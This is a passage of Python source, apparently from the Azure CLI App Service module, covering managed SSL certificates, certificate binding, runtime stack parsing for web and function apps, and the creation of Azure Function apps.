raise ResourceNotFoundError("{0}app {1} doesn't exist in resource group {2}".format(slot_text,
name,
resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise ValidationError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise ValidationError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_app(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
# pylint: disable=too-few-public-methods
class _AbstractStackRuntimeHelper:
def __init__(self, cmd, linux=False, windows=False):
self._cmd = cmd
self._client = web_client_factory(cmd.cli_ctx, api_version="2021-01-01")
self._linux = linux
self._windows = windows
self._stacks = []
@property
def stacks(self):
self._load_stacks()
return self._stacks
def _get_raw_stacks_from_api(self):
raise NotImplementedError
# updates self._stacks
def _parse_raw_stacks(self, stacks):
raise NotImplementedError
def _load_stacks(self):
if self._stacks:
return
stacks = self._get_raw_stacks_from_api()
self._parse_raw_stacks(stacks)
# WebApps stack class
class _StackRuntimeHelper(_AbstractStackRuntimeHelper):
# pylint: disable=too-few-public-methods
class Runtime:
def __init__(self, display_name=None, configs=None, github_actions_properties=None, linux=False):
self.display_name = display_name
self.configs = configs if configs is not None else dict()
self.github_actions_properties = github_actions_properties
self.linux = linux
def __init__(self, cmd, linux=False, windows=False):
# TODO try and get API support for this so it isn't hardcoded
self.windows_config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version',
'dotnet': 'net_framework_version',
'dotnetcore': None
}
self.default_delimeter = "|" # character that separates runtime name from version
self.allowed_delimeters = "|:" # delimiters allowed: '|', ':'
super().__init__(cmd, linux=linux, windows=windows)
def get_stack_names_only(self, delimiter=None):
windows_stacks = [s.display_name for s in self.stacks if not s.linux]
linux_stacks = [s.display_name for s in self.stacks if s.linux]
if delimiter is not None:
windows_stacks = [n.replace(self.default_delimeter, delimiter) for n in windows_stacks]
linux_stacks = [n.replace(self.default_delimeter, delimiter) for n in linux_stacks]
if self._linux and not self._windows:
return linux_stacks
if self._windows and not self._linux:
return windows_stacks
return {LINUX_OS_NAME: linux_stacks, WINDOWS_OS_NAME: windows_stacks}
def _get_raw_stacks_from_api(self):
return list(self._client.provider.get_web_app_stacks(stack_os_type=None))
def _parse_raw_stacks(self, stacks):
for lang in stacks:
if lang.display_text.lower() == "java":
continue # info on java stacks is taken from the "java containers" stacks
for major_version in lang.major_versions:
if self._linux:
self._parse_major_version_linux(major_version, self._stacks)
if self._windows:
self._parse_major_version_windows(major_version, self._stacks, self.windows_config_mappings)
def remove_delimiters(self, runtime):
import re
runtime = re.split("[{}]".format(self.allowed_delimeters), runtime)
return self.default_delimeter.join(filter(None, runtime))
def resolve(self, display_name, linux=False):
display_name = display_name.lower()
stack = next((s for s in self.stacks if s.linux == linux and s.display_name.lower() == display_name), None)
if stack is None: # help convert previously acceptable stack names into correct ones if runtime not found
old_to_new_windows = {
"node|12-lts": "node|12lts",
"node|14-lts": "node|14lts",
"node|16-lts": "node|16lts",
"dotnet|5.0": "dotnet|5",
"dotnet|6.0": "dotnet|6",
}
old_to_new_linux = {
"dotnet|5.0": "dotnetcore|5.0",
"dotnet|6.0": "dotnetcore|6.0",
}
if linux:
display_name = old_to_new_linux.get(display_name)
else:
display_name = old_to_new_windows.get(display_name)
stack = next((s for s in self.stacks if s.linux == linux and s.display_name.lower() == display_name), None)
return stack
@classmethod
def get_site_config_setter(cls, runtime, linux=False):
if linux:
return cls.update_site_config
return cls.update_site_appsettings if 'node' in runtime.display_name.lower() else cls.update_site_config
# assumes non-java
def get_default_version(self, lang, linux=False, get_windows_config_version=False):
versions = self.get_version_list(lang, linux, get_windows_config_version)
versions.sort()
if not versions:
os = WINDOWS_OS_NAME if not linux else LINUX_OS_NAME
raise ValidationError("Invalid language type {} for OS {}".format(lang, os))
return versions[0]
# assumes non-java
def get_version_list(self, lang, linux=False, get_windows_config_version=False):
lang = lang.upper()
versions = []
for s in self.stacks:
if s.linux == linux:
l_name, v, *_ = s.display_name.upper().split("|")
if l_name == lang:
if get_windows_config_version:
versions.append(s.configs[self.windows_config_mappings[lang.lower()]])
else:
versions.append(v)
return versions
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack.configs.items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack.configs.items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
# format a (non-java) windows runtime display text
# TODO get API to return more CLI-friendly display text for windows stacks
@classmethod
def _format_windows_display_text(cls, display_text):
import re
t = display_text.upper()
t = t.replace(".NET CORE", NETCORE_RUNTIME_NAME.upper())
t = t.replace("ASP.NET", ASPDOTNET_RUNTIME_NAME.upper())
t = t.replace(".NET", DOTNET_RUNTIME_NAME)
t = re.sub(r"\(.*\)", "", t) # remove "(LTS)"
return t.replace(" ", "|", 1).replace(" ", "")
@classmethod
def _is_valid_runtime_setting(cls, runtime_setting):
return runtime_setting is not None and not runtime_setting.is_hidden and not runtime_setting.is_deprecated
@classmethod
def _get_runtime_setting(cls, minor_version, linux, java):
if not linux:
if not java:
return minor_version.stack_settings.windows_runtime_settings
return minor_version.stack_settings.windows_container_settings
if not java:
return minor_version.stack_settings.linux_runtime_settings
return minor_version.stack_settings.linux_container_settings
@classmethod
def _get_valid_minor_versions(cls, major_version, linux, java=False):
def _filter(minor_version):
return cls._is_valid_runtime_setting(cls._get_runtime_setting(minor_version, linux, java))
return [m for m in major_version.minor_versions if _filter(m)]
def _parse_major_version_windows(self, major_version, parsed_results, config_mappings):
minor_java_versions = self._get_valid_minor_versions(major_version, linux=False, java=True)
default_java_version = next(iter(minor_java_versions), None)
if default_java_version:
container_settings = default_java_version.stack_settings.windows_container_settings
# TODO get the API to return java versions in a more parseable way
for java_version in ["1.8", "11"]:
java_container = container_settings.java_container
container_version = container_settings.java_container_version
if container_version.upper() == "SE":
java_container = "Java SE"
if java_version == "1.8":
container_version = "8"
else:
container_version = "11"
runtime_name = "{}|{}|{}|{}".format("java",
java_version,
java_container,
container_version)
gh_actions_version = "8" if java_version == "1.8" else java_version
gh_actions_runtime = "{}, {}, {}".format(java_version,
java_container.lower().replace(" se", ""),
container_settings.java_container_version.lower())
if java_container == "Java SE": # once runtime name is set, reset configs to correct values
java_container = "JAVA"
container_version = "SE"
runtime = self.Runtime(display_name=runtime_name,
configs={"java_version": java_version,
"java_container": java_container,
"java_container_version": container_version},
github_actions_properties={"github_actions_version": gh_actions_version,
"app_runtime": "java",
"app_runtime_version": gh_actions_runtime},
linux=False)
parsed_results.append(runtime)
else:
minor_versions = self._get_valid_minor_versions(major_version, linux=False, java=False)
for minor_version in minor_versions:
settings = minor_version.stack_settings.windows_runtime_settings
runtime_name = self._format_windows_display_text(minor_version.display_text)
runtime = self.Runtime(display_name=runtime_name, linux=False)
lang_name = runtime_name.split("|")[0].lower()
config_key = config_mappings.get(lang_name)
if config_key:
runtime.configs[config_key] = settings.runtime_version
gh_properties = settings.git_hub_action_settings
if gh_properties.is_supported:
runtime.github_actions_properties = {"github_actions_version": gh_properties.supported_version}
parsed_results.append(runtime)
def _parse_major_version_linux(self, major_version, parsed_results):
minor_java_versions = self._get_valid_minor_versions(major_version, linux=True, java=True)
default_java_version_linux = next(iter(minor_java_versions), None)
if default_java_version_linux:
linux_container_settings = default_java_version_linux.stack_settings.linux_container_settings
runtimes = [(linux_container_settings.java11_runtime, "11"), (linux_container_settings.java8_runtime, "8")]
for runtime_name, version in [(r, v) for (r, v) in runtimes if r is not None]:
runtime = self.Runtime(display_name=runtime_name,
configs={"linux_fx_version": runtime_name},
github_actions_properties={"github_actions_version": version},
linux=True,
)
parsed_results.append(runtime)
else:
minor_versions = self._get_valid_minor_versions(major_version, linux=True, java=False)
for minor_version in minor_versions:
settings = minor_version.stack_settings.linux_runtime_settings
runtime_name = settings.runtime_version
runtime = self.Runtime(display_name=runtime_name,
configs={"linux_fx_version": runtime_name},
linux=True,
)
gh_properties = settings.git_hub_action_settings
if gh_properties.is_supported:
runtime.github_actions_properties = {"github_actions_version": gh_properties.supported_version}
parsed_results.append(runtime)
# override _load_stacks() to call this method to use hardcoded stacks
def _load_stacks_hardcoded(self):
import os
stacks_file = os.path.abspath(os.path.join(os.path.abspath(__file__), '../resources/WebappRuntimeStacks.json'))
if self._stacks:
return
stacks = []
if self._linux:
stacks_json = get_file_json(stacks_file)['linux']
for r in stacks_json:
stacks.append(self.Runtime(display_name=r.get("displayName"),
configs=r.get("configs"),
github_actions_properties=r.get("github_actions_properties"),
linux=True))
if self._windows: # Windows stacks
stacks_json = get_file_json(stacks_file)['windows']
for r in stacks_json:
stacks.append(self.Runtime(display_name=r.get("displayName"),
configs=r.get("configs"),
github_actions_properties=r.get("github_actions_properties"),
linux=False))
self._stacks = stacks
class _FunctionAppStackRuntimeHelper(_AbstractStackRuntimeHelper):
# pylint: disable=too-few-public-methods,too-many-instance-attributes
class Runtime:
def __init__(self, name=None, version=None, is_preview=False, supported_func_versions=None, linux=False,
app_settings_dict=None, site_config_dict=None, app_insights=False, default=False):
self.name = name
self.version = version
self.is_preview = is_preview
self.supported_func_versions = [] if not supported_func_versions else supported_func_versions
self.linux = linux
self.app_settings_dict = dict() if not app_settings_dict else app_settings_dict
self.site_config_dict = dict() if not site_config_dict else site_config_dict
self.app_insights = app_insights
self.default = default
self.display_name = "{}|{}".format(name, version) if version else name
# used for displaying stacks
def to_dict(self):
return {"runtime": self.name,
"version": self.version,
"supported_functions_versions": self.supported_func_versions}
def __init__(self, cmd, linux=False, windows=False):
self.disallowed_functions_versions = {"~1", "~2"}
self.KEYS = FUNCTIONS_STACKS_API_KEYS()
super().__init__(cmd, linux=linux, windows=windows)
def resolve(self, runtime, version=None, functions_version=None, linux=False):
stacks = self.stacks
runtimes = [r for r in stacks if r.linux == linux and runtime == r.name]
os = LINUX_OS_NAME if linux else WINDOWS_OS_NAME
if not runtimes:
supported_runtimes = [r.name for r in stacks if r.linux == linux]
raise ValidationError("Runtime {0} not supported for os {1}. Supported runtimes for os {1} are: {2}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(runtime, os, supported_runtimes))
if version is None:
return self.get_default_version(runtime, functions_version, linux)
matched_runtime_version = next((r for r in runtimes if r.version == version), None)
if not matched_runtime_version:
# help convert previously acceptable versions into correct ones if match not found
old_to_new_version = {
"11": "11.0",
"8": "8.0"
}
new_version = old_to_new_version.get(version)
matched_runtime_version = next((r for r in runtimes if r.version == new_version), None)
if not matched_runtime_version:
versions = [r.version for r in runtimes]
raise ValidationError("Invalid version: {0} for runtime {1} and os {2}. Supported versions for runtime "
"{1} and os {2} are: {3}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(version, runtime, os, versions))
if functions_version not in matched_runtime_version.supported_func_versions:
supported_func_versions = matched_runtime_version.supported_func_versions
raise ValidationError("Functions version {} is not supported for runtime {} with version {} and os {}. "
"Supported functions versions are {}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(functions_version, runtime, version, os, supported_func_versions))
return matched_runtime_version
def get_default_version(self, runtime, functions_version, linux=False):
runtimes = [r for r in self.stacks if r.linux == linux and r.name == runtime]
runtimes.sort(key=lambda r: r.default, reverse=True) # make runtimes with default=True appear first
for r in runtimes:
if functions_version in r.supported_func_versions:
return r
raise ValidationError("Could not find a runtime version for runtime {} with functions version {} and os {}"
"Run 'az functionapp list-runtimes' for more details on supported runtimes. ")
def _get_raw_stacks_from_api(self):
return list(self._client.provider.get_function_app_stacks(stack_os_type=None))
# remove non-digit or non-"." chars
@classmethod
def _format_version_name(cls, name):
import re
return re.sub(r"[^\d\.]", "", name)
# format version names while maintaining uniqueness
def _format_version_names(self, runtime_to_version):
formatted_runtime_to_version = {}
for runtime, versions in runtime_to_version.items():
formatted_runtime_to_version[runtime] = formatted_runtime_to_version.get(runtime, dict())
for version_name, version_info in versions.items():
formatted_name = self._format_version_name(version_name)
if formatted_name in formatted_runtime_to_version[runtime]:
formatted_name = version_name.lower().replace(" ", "-")
formatted_runtime_to_version[runtime][formatted_name] = version_info
return formatted_runtime_to_version
@classmethod
def _format_function_version(cls, v):
return v.replace("~", "")
def _get_valid_function_versions(self, runtime_settings):
supported_function_versions = runtime_settings.supported_functions_extension_versions
valid_versions = []
for v in supported_function_versions:
if v not in self.disallowed_functions_versions:
valid_versions.append(self._format_version_name(v))
return valid_versions
def _parse_minor_version(self, runtime_settings, major_version_name, minor_version_name, runtime_to_version):
if not runtime_settings.is_deprecated:
functions_versions = self._get_valid_function_versions(runtime_settings)
if functions_versions:
runtime_version_properties = {
self.KEYS.IS_PREVIEW: runtime_settings.is_preview,
self.KEYS.SUPPORTED_EXTENSION_VERSIONS: functions_versions,
self.KEYS.APP_SETTINGS_DICT: runtime_settings.app_settings_dictionary,
self.KEYS.APPLICATION_INSIGHTS: runtime_settings.app_insights_settings.is_supported,
self.KEYS.SITE_CONFIG_DICT: runtime_settings.site_config_properties_dictionary,
self.KEYS.IS_DEFAULT: bool(runtime_settings.is_default),
}
runtime_name = (runtime_settings.app_settings_dictionary.get(self.KEYS.FUNCTIONS_WORKER_RUNTIME) or
major_version_name)
runtime_to_version[runtime_name] = runtime_to_version.get(runtime_name, dict())
runtime_to_version[runtime_name][minor_version_name] = runtime_version_properties
def _create_runtime_from_properties(self, runtime_name, version_name, version_properties, linux):
supported_func_versions = version_properties[self.KEYS.SUPPORTED_EXTENSION_VERSIONS]
return self.Runtime(name=runtime_name,
version=version_name,
is_preview=version_properties[self.KEYS.IS_PREVIEW],
supported_func_versions=supported_func_versions,
linux=linux,
site_config_dict=version_properties[self.KEYS.SITE_CONFIG_DICT],
app_settings_dict=version_properties[self.KEYS.APP_SETTINGS_DICT],
app_insights=version_properties[self.KEYS.APPLICATION_INSIGHTS],
default=version_properties[self.KEYS.IS_DEFAULT],
)
def _parse_raw_stacks(self, stacks):
# build a map of runtime -> runtime version -> runtime version properties
runtime_to_version_linux = {}
runtime_to_version_windows = {}
for runtime in stacks:
for major_version in runtime.major_versions:
for minor_version in major_version.minor_versions:
runtime_version = minor_version.value
linux_settings = minor_version.stack_settings.linux_runtime_settings
windows_settings = minor_version.stack_settings.windows_runtime_settings
if linux_settings is not None:
self._parse_minor_version(runtime_settings=linux_settings,
major_version_name=runtime.name,
minor_version_name=runtime_version,
runtime_to_version=runtime_to_version_linux)
if windows_settings is not None:
self._parse_minor_version(runtime_settings=windows_settings,
major_version_name=runtime.name,
minor_version_name=runtime_version,
runtime_to_version=runtime_to_version_windows)
runtime_to_version_linux = self._format_version_names(runtime_to_version_linux)
runtime_to_version_windows = self._format_version_names(runtime_to_version_windows)
for runtime_name, versions in runtime_to_version_windows.items():
for version_name, version_properties in versions.items():
r = self._create_runtime_from_properties(runtime_name, version_name, version_properties, linux=False)
self._stacks.append(r)
for runtime_name, versions in runtime_to_version_linux.items():
for version_name, version_properties in versions.items():
r = self._create_runtime_from_properties(runtime_name, version_name, version_properties, linux=True)
self._stacks.append(r)
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise ResourceNotFoundError("App Insights {} under resource group {} was not found.".format(name,
resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku, number_of_workers=None,
max_burst=None, location=None, tags=None, zone_redundant=False):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_tier(sku)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will "
"be required. To create a 3.x function you would pass in the flag `--functions-version 3`")
functions_version = '3'
if deployment_source_url and deployment_local_git:
raise MutuallyExclusiveArgumentError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise MutuallyExclusiveArgumentError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
from azure.mgmt.web.models import Site
SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
client = web_client_factory(cmd.cli_ctx)
if vnet or subnet:
if plan:
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
webapp_location = plan_info.location
else:
webapp_location = consumption_plan_location
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
vnet_sub_id=subnet_info["subnet_subscription_id"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
functionapp_def = Site(location=None, site_config=site_config, tags=tags,
virtual_network_subnet_id=subnet_resource_id)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise ValidationError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = bool(os_type and os_type.lower() == LINUX_OS_NAME)
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = bool(plan_info.reserved)
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise ValidationError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise ArgumentUsageError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
if runtime is None and runtime_version is not None:
raise ArgumentUsageError('Must specify --runtime to use --runtime-version')
runtime_helper = _FunctionAppStackRuntimeHelper(cmd, linux=is_linux, windows=(not is_linux))
matched_runtime = runtime_helper.resolve("dotnet" if not runtime else runtime,
runtime_version, functions_version, is_linux)
site_config_dict = matched_runtime.site_config_dict
app_settings_dict = matched_runtime.app_settings_dict
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_dict.use32_bit_worker_process = False
app_settings_dict = {}
# ensure that app insights is created if not disabled
matched_runtime.app_insights = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_dict.as_dict().items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_dict.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not matched_runtime.app_insights:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and matched_runtime.app_insights:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
